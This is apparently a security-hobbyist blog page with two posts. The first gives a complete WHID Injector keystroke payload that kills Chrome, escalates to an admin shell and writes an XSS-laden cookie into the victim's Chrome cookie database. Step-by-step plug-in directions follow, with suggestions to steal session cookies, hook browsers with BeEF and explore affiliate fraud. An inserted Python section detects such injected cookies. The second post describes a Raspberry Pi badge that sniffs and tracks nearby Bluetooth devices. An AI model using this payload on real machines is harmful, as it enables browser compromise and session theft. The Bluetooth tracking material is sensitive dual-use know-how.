Tuesday, December 25, 2018

COOKIE BAKING: WHID-Injected Cookies

Baking up some holiday WHID-Injected Cookies...


Just in time for the holidays...LostRabbitLabs recently updated the cookie fuzzing tool "Anomalous Cookie" and rabbit-holed its way into a new attack vector called "Cookie Baking".

What is Cookie Baking?
Cookie Baking is the technique of creating or modifying a cookie in a user's local cookie jar. This includes stuffing it with malicious payloads, affiliate tags, fuzz strings and more. Cookie Baking also provides a delivery method for targeting 'Self-XSS' vulnerabilities, allowing them to be exploited.


Epic Holiday Cookie Baking...

If you would like to read more about 'Cookie Baking' and how it has been recently used, check out the blog "Epic Holiday Cookie Baking" at the Coalfire Labs website (link below):



Let's take the example XSS vulnerability discussed in "Epic Holiday Cookie Baking" and create a WHID Injector payload that can be used in our ingredients list.


MERRY CHRISTMAS from LostRabbitLabs...below you will find the full recipe for 'WHID-Injected Cookies'. >8-P



.-= WHID-Injected Cookies =-.

INGREDIENTS:
---------------------------------------------
  1.  1 x WHID-Injector (https://github.com/whid-injector/WHID)
  2.  1 x 'target' computer (in our 'case'...a Windows system)
  3.  1 x Vulnerable Cookie (using '_epicSID' from the example above)
  4.  1 x 'CookieBaker-WHID.txt' payload file (found below)

OPTIONAL:
      1 x WHID-Injector to Motherboard adapter (WI-to-MB) -  pictured below

NOTE: If you can 'Hide Yo' WHID' inside the 'target case', this will add persistence to your 'Cookie Baking'!

 
 


=============================================
=============================================

 'CookieBaker-WHID.txt'
  (save contents below to file - to be uploaded to your WHID Injector)

=============================================
=============================================

Delay
Delay
Delay
Press:131+114
PrintLine:powershell Start-Process cmd.exe -Verb runAs
Delay
Press:130+121
Delay
PrintLine:taskkill /im chrome.exe* /f
Delay
PrintLine:powershell
Delay
PrintLine:Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Delay
PrintLine:Install-Module PSSQLite -Force
Delay
PrintLine:set-executionpolicy remotesigned
Delay
PrintLine:Import-Module PSSQLite
Delay
PrintLine:$Database = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Delay
PrintLine:$query = "INSERT INTO cookies (creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,encrypted_value,firstpartyonly) VALUES ('13186874114525467','.epicgames.com','_epicSID','kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3efbu5ubf6b6ce405264df19ea1394b58aba4d0','/','0','0','1','13386874114525467','0','1','0',NULL,'0')"
Delay
PrintLine:Invoke-SqliteQuery -DataSource $Database -Query $query
Delay
PrintLine:exit
Delay
PrintLine:exit

=============================================
=============================================
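A defender's counterpart to the recipe above, added here and not part of the original post: a Python audit of a Chrome 'Cookies' SQLite database that flags rows carrying the tell-tale signs of a hand-inserted cookie (markup in the value, a last_access_utc in the future, is_persistent without has_expires, and on a Windows profile a plaintext value where Chrome would have written a DPAPI blob into encrypted_value). The database, the benign row and the DPAPI blob are constructed in memory; the injected row reuses the two timestamps from the payload.

```python
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Chrome stores cookie times as microseconds since 1601-01-01 UTC (the WebKit epoch)
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
to_webkit = lambda dt: (dt - WEBKIT_EPOCH) // timedelta(microseconds=1)
from_webkit = lambda us: WEBKIT_EPOCH + timedelta(microseconds=us)

# The column subset named in the payload's INSERT statement
COLUMNS = ("creation_utc", "host_key", "name", "value", "path", "expires_utc",
           "is_secure", "is_httponly", "last_access_utc", "has_expires",
           "is_persistent", "priority", "encrypted_value", "firstpartyonly")

def audit_cookies(con, now_utc, windows_profile=True):
    """Return {(host_key, name): [reasons]} for rows that look hand-inserted rather than browser-set."""
    now_wk, findings = to_webkit(now_utc), {}
    for row in con.execute(f"SELECT {','.join(COLUMNS)} FROM cookies"):
        c, hits = dict(zip(COLUMNS, row)), []
        decoded = unquote(c["value"] or "").lower()        # injected payloads arrive URL-encoded
        if any(tok in decoded for tok in ("<script", "javascript:", "onerror=")):
            hits.append("markup in value")
        if c["last_access_utc"] > now_wk:                   # the browser never writes future times
            hits.append("last_access in the future")
        if c["is_persistent"] and not c["has_expires"]:     # a persistent cookie carries an expiry
            hits.append("persistent without expiry")
        if windows_profile and c["value"] and not c["encrypted_value"]:
            hits.append("plaintext value on a DPAPI-encrypted profile")
        if hits:
            findings[(c["host_key"], c["name"])] = hits
    return findings

def build_sample_db():
    """Constructed in-memory stand-in for the Chrome 'Cookies' file the payload writes to."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE cookies ({','.join(COLUMNS)})")
    t_ok = to_webkit(datetime(2018, 12, 20, tzinfo=timezone.utc))
    rows = [
        # browser-set session cookie: empty value, (constructed) DPAPI blob in encrypted_value
        (t_ok, ".example.com", "sid", "", "/", 0, 1, 1, t_ok, 0, 0, 1, b"\x01\x00\x00\x00DPAPI", 0),
        # hand-inserted row modelled on the payload: markup, future access time, no expiry, NULL blob
        (13186874114525467, ".epicgames.com", "_epicSID", "abc%3cScRiPt%3ealert(1)%3c%2fScRiPt%3e",
         "/", 0, 0, 1, 13386874114525467, 0, 1, 0, None, 0),
    ]
    con.executemany(f"INSERT INTO cookies VALUES ({','.join('?' * len(COLUMNS))})", rows)
    return con

def demo(now_utc=datetime(2018, 12, 25, tzinfo=timezone.utc)):
    return audit_cookies(build_sample_db(), now_utc)
```

Against a real profile, run audit_cookies on a copy of the Cookies file opened with sqlite3.connect() while Chrome is closed; the payload's own taskkill step is a reminder that the file is locked while the browser runs.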

DIRECTIONS:
---------------------------------------------
  1. Plug 'WHID-Injector' into 'target' system
  2. Connect to WIFI network on pre-configured access-point of WHID-Injector
  3. Navigate to http://192.168.1.1 (or your custom pre-configured network)
  4. Choose 'Upload Payload' and select our newly created 'CookieBaker-WHID.txt' file
  5. From the main menu choose 'CookieBaker-WHID.txt' from the payload list
  6. Click on 'Run Payload' button to run Cookie Baker on target system
  7. Target exploited. Eat carrots. The cookie payload above shows a proof-of-concept XSS injection attack vector and payload, but you will need to create the full working payload yourself! Will you steal session cookies, BeEF hook them or create a more clever client-side attack not yet seen?




Next Steps...


  1. Update 'Anomalous Cookie' as needed with better payloads/techniques
  2. Create Metasploit module for 'Cookie Baking' framework
  3. Catalog all known vulnerable cookies and create shared database
  4. Investigate 'Affiliate Fraud' possibilities




                                           ...and a Happy New Year!



Saturday, October 13, 2018

DERBYCON VIII: Bluetooth DeMystifier

How to make a wearable Raspberry Pi...


LostRabbitLabs created five (5) 'Bluetooth DeMystifiers' and brought them to DerbyCon to share. This page will serve as the howto and manual for those who have the badge and those who would like to build one. All parts needed to build one along with instructions on how to use will be listed below. If you would like a copy of the original SDCard image (RaspberryPI Wireless Zero) let me know and I will provide the link. Code will be posted to our Github soon.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What is a Bluetooth DeMystifier?
Using a Raspberry PI Zero Wireless tucked in a bag (making it a 'Hacky Sack' - thank you pancho for the great name)...it is a bluetooth enumerator, logger, identifier, sniffer, collector & plotter with ssh & web interfaces for admin access. With the DeMystifier you can...identify bluetooth/BLE devices around you, plot their signals over time providing real-time proximity data, and collect stats on Top Mac Addresses and Vendors observed. This can assist with locating lost devices, detecting if you are being followed, and give some insight into the Bluetooth Darknet that exists all around us.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What you will need:
1. Raspberry PI Wireless Zero
2. Adafruit PiTFT 2.2" HAT Mini Kit - 320x240 2.2"
3. GPIO headers (for connecting PI to PiTFT)
4. Adafruit PowerBoost 1000C & one (1) on/off switch
5. 3.7v 2000mAh Lithium Ion Battery
6. One small leathery bag & Paracord



Back and front view of DeMystifier before it goes in the bag! Notice the four (4) buttons on the front below the screen!

Putting things together is pretty easy. Solder headers onto the Raspberry Pi. Solder the PiTFT to the headers (leaving room for access to the microUSB ports on the Pi). Connect power wires from the PowerBoost to the Raspberry Pi and attach the battery. Slide it in the bag and loop paracord through the bag ties. Leather-punky...and done!



How to use:
1. Charge battery (or use microUSB power while charging)
2. Turn on/off switch to ON position (located on back of badge)
3. Device boots up! You should see output and boot-up images (shown below) on the screen followed by the DerbyCon VIII splash screen (pictured above). Be patient; the badge may take 1-2 minutes to boot up completely.


4. Using the four (4) buttons on the front of the badge, you can access different bluetooth data being collected/observed.

BUTTON 1:
Displays a graph of the Top 10 most observed Bluetooth Mac Addresses over time. This shows patterns in observed bluetooth traffic, devices and the people/objects who control them. Use for Red-Teaming, Blue-Teaming, Purple-Teaming, Asset management, and curiosity!





BUTTON 2:
Pressing this button will show statistics around total Mac Addresses, vendors and connections observed along with a listing of all devices observed in the last 60 seconds.



The Bluetooth DeMystifier uses the open source software package 'bluetoothctl' to provide some of the data seen in this view.






BUTTON 3:
This shows a real-time, enriched view (in the CSV format) of bluetooth/BLE signals observed complete with timestamp, vendor OUI lookup, and leaked strings.



BUTTON 4:
The Bluetooth DeMystifier uses the open source software package 'hcitool' to provide some of the data seen in this view. It provides real-time BLE sniffing. Occasionally the command 'hcitool lescan' displays an I/O error message. Just press the button again...and wish for the best!





How to access the SSH and WEB interfaces:
In order to access the SSH and Web interfaces you will need to modify the existing 'wpa_supplicant.conf' file to use your own wireless network. This can be achieved by mounting the SD card and modifying the "/etc/wpa_supplicant/wpa_supplicant.conf" file.

wpa_supplicant.conf:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
 ssid="YOUR WIFI_SSID"
 psk="YOUR_WPA_KEY"
}

------------------------------------------------
Once your Bluetooth DeMystifier is online...you can log in over SSH using the steps below.

SSH LOGIN:


1. Log in to Raspberry PI using the user 'pi2' and the password 'derbycon'
2. Gain root privileges using the command 'su -' and then using 'derbycon' as the password.
3. All data and important files are in '/home/pi/installs'.
4. Factory reset the DeMystifier (clearing out all bluetooth stats and starting over) by running '/home/pi/installs/clean.sh' and rebooting.

------------------------------------------------

WEB ACCESS:
The web interface for 'Bluetooth DeMystifier' provides additional graphs, logs, and the ability to plot any Mac Address you request. Available data includes...

  • Bluetooth Stats - Macs, Vendors, Strings
  • All Discovered Devices (Name/Mac)
  • Discovered Devices Last 5 Minutes (Name/Mac)
  • CSV Version of Log Data
  • Top 10 MACADDRS - Last 10 Minutes
  • Top 10 MACADDRS - All-Time
Sample CSV output data shown below...

Use the '/home/pi/installs/tags.txt' file to create MAC-to-TAG translations as well as plot any Mac Address using the request URL below:

http://YOUR_IP_ADDRESS:1337/?macaddr=01:02:03:04:05:06
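As an added example (not the badge's own code, which the post says will be released later), here is the bookkeeping behind the Top-10, device-list and per-MAC views above, in Python: parse the enriched CSV log, look up the vendor by OUI, apply tags.txt labels, and pull the RSSI-over-time series that a ?macaddr= request plots. The CSV layout, the OUI table and the tags.txt format are assumptions, and the log lines are constructed.

```python
import csv
from collections import Counter
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample of the enriched CSV log; the "time,MAC,RSSI,advertised name" layout is assumed
SAMPLE_LOG = """\
2018-10-06 14:00:05,AC:DE:48:00:11:22,-58,
2018-10-06 14:00:06,00:1A:7D:DA:71:13,-72,Keyboard K380
2018-10-06 14:04:10,AC:DE:48:00:11:22,-63,
2018-10-06 14:06:30,F0:18:98:AA:BB:CC,-80,
2018-10-06 14:08:15,AC:DE:48:00:11:22,-70,
2018-10-06 14:09:50,00:1A:7D:DA:71:13,-75,Keyboard K380
2018-10-06 14:09:55,AC:DE:48:00:11:22,-77,
"""
# Constructed OUI table (first three octets -> vendor); a real build loads the IEEE OUI list
OUI = {"AC:DE:48": "Example Vendor A", "00:1A:7D": "Example Vendor B"}
# Constructed tags.txt content; one "MAC TAG" pair per line is an assumed layout
TAGS_TXT = "AC:DE:48:00:11:22 my-phone\n00:1A:7D:DA:71:13 office-keyboard\n"

def parse_log(text):
    """CSV text -> list of (datetime, MAC, RSSI dBm, advertised name)."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), mac.upper(), int(rssi), name)
            for ts, mac, rssi, name in csv.reader(StringIO(text))]

def vendor(mac):
    return OUI.get(mac[:8].upper(), "unknown")

def load_tags(text):
    return dict(line.split(None, 1) for line in text.splitlines() if line.strip())

def top_macs(rows, n=10, minutes=None, now=None):
    """Top-N MACs by sightings; minutes limits to the most recent window, None = all-time."""
    if minutes is not None:
        now = now or max(r[0] for r in rows)          # newest sighting stands in for 'now'
        rows = [r for r in rows if r[0] >= now - timedelta(minutes=minutes)]
    return Counter(r[1] for r in rows).most_common(n)

def proximity(rows, mac):
    """(time, RSSI) series for one MAC: the data behind a ?macaddr=... plot."""
    return [(r[0], r[2]) for r in rows if r[1] == mac.upper()]

def label(mac, tags):
    """What a device list would show: the operator's tag if known, else the OUI vendor."""
    return tags.get(mac.upper(), vendor(mac))
```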


Thank you DerbyCon!
It was a great DerbyCon and I can't wait to go back next year. Great staff, family and local hospitality (not to mention the great food and drink). To many more!